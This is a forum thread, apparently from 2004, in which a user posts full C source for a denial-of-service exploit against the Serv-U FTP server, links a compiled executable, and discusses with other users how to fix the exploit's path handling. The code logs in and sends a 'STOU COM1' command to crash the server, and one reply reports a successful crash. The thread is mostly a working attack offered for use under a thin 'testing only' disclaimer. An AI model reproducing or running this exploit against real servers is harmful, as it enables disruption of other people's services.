[mortello]

Thanks to Ecko for his Perl exploit....made me think of doing this one and it was challenging :)

This exploit is not as good as Ecko's one if you can run Perl code, but if you can't you can use this one if you have ftp.exe in your computer root....I'll try making a code that doesn't need ftp.exe later....

Use it with your mind....nothing illegal too !

//--------------------------------------------------------------------------------
// Serv-U (up to 5.2) DoS Exploit by Mortello
// Advisory : http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html
// This exploit requires that you have ftp.exe in your systemroot.
// Couldn't figure out how to get the %systemroot% in the spawnl(), so any idea
// would be appreciated...
// This is my first exploit....guess the code could have been better, now I'm
// going to try to make a DoS exploit not using the ftp.exe...
// Dedicated to : The piece of cheddar and the limonade I took doing this code.
// Greetings : You know who you are !
// Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no
// responsibility on the other uses of this program !
//--------------------------------------------------------------------------------

#include <stdio.h>
#include <process.h>

/* The following function will help the user understand how to use this program. */
void usage(char name[]);
/* Program call to create a ftp.txt file.*/
void file(void);
/* Call ftp.exe and execute it using the ftp.txt created earlier. */
void execute(void);

char *ip;
int port;
char *user;
char *password;

int main(int argc, char* argv[])
{
	if (argc <5)
  usage(argv[0]);
	else if (atoi(argv[2]) < 0 || atoi(argv[2]) > 65535)
  usage(argv[0]);
	else
	{
  ip = argv[1];
  port = atoi(argv[2]);
  user = argv[3];
  password = argv[4];
  puts("Serv-U STOU DoS Exploit by Mortello");
  file();
  execute();
	}
	return 0;
}

// How to use the program !
void usage(char name[])
{
	puts("");
	puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*");
	puts(" Serv-U Denial Of Service, tested on Serv-U 5.1.0.0 and 5.0.0.0.");
	puts(" Should work on latest serv-U (as of Sept. 12th, 2004)");
	puts(" Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no");
	puts(" responsibility on the other uses of this program !");
	puts(" USAGE :");
	printf(" %s \"IP\" \"PORT\" \"USERNAME\" \"PASSWORD\"\n", name);
	puts(" Account needs to be able to log-in, nothing else necessary.");
	puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*");
	puts("");
}

void file()
{
	FILE *fp;
	// Will write in a ftp.txt file.
	if ((fp = fopen("ftp.txt", "w")) != NULL)
	{
  fprintf(fp, "open %s %d\n", ip, port);
  fprintf(fp, "%s\n", user);
  fprintf(fp, "%s\n", password);
  fprintf(fp, "binary\n");
  fprintf(fp, "quote STOU COM1\n");
  //Would also have worked :
  //fprintf(fp, "quote STOU LPT1\n");
  //fprintf(fp, "quote STOU PRN\n");
  //fprintf(fp, "quote STOU AUX\n");
  fprintf(fp, "quit");//If ftp.exe goes through this line, DoS didn't work.
  fclose(fp);
	}
	else
  // You don't have write perms on your comp ? strange !
  puts("No write permissions ?");
}

void execute()
{
	int value;
	// Part of code that I couldn't make work with %systemroot%
	value = spawnl(P_WAIT, "c:\\winnt\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL);
	value = spawnl(P_WAIT, "c:\\windows\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL);
	if (value == -1)
  puts("Problem!");
	else
	{
  remove("ftp.txt");
  puts("Server should have crashed by now !");
	}
}

[mortello]

Here it is compiled for you !

Attached File(s)

•  servDoS.exe (120K)
  Number of downloads: 99

[nackas]

Hmm interesting stuff mortello! Will test this on my local ftp and see how it goes ;)

EDIT: ServUDaemon.exe has encountered a problem and needs to close. We are sorry for the inconvenience. Nice one! :D

[arn0ld]

for me not
saying "problem!" on and on
and i'm sure the pass user are correct

[mortello]

arn0ld, on Sep 13 2004, 10:04 AM, said:

for me not
saying "problem!" on and on
and i'm sure the pass user are correct

what's your %systemroot% ? if it is c:\winnt\ or c:\windows
then you don't have ftp.exe in that folder and there is a problem....hence the "Problem!"
Otherwise, you have a different %systemroot% and I'd like to add it to the code if you could tell me what it is :)

[usch]

ehm dude. just use "ftp.exe" instead of "C:\windows..."
cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path.
e.g. this line of code works i tested it:
WinExec("ftp.exe",SW_SHOW);

hope i helped

see ya
usch

[mortello]

usch, on Sep 13 2004, 03:49 PM, said:

ehm dude. just use "ftp.exe" instead of "C:\windows..."
cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path.
e.g. this line of code works i tested it:
WinExec("ftp.exe",SW_SHOW);

hope i helped

see ya
usch

I tried using it with spawnl() but it didn't work....

I'll check some info on WinExec(...) and see what that does....thanks for the feedback :)

[Figo]

usch, on Sep 13 2004, 03:49 PM, said:

ehm dude. just use "ftp.exe" instead of "C:\windows..."
cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path.
e.g. this line of code works i tested it:
WinExec("ftp.exe",SW_SHOW);

hope i helped

see ya
usch

be sure c:\%systemroot%\system32\ is in ur path definition eh ;)

[dmg]

system("ftp.exe -i -s:ftp.txt");

should also work (not tested)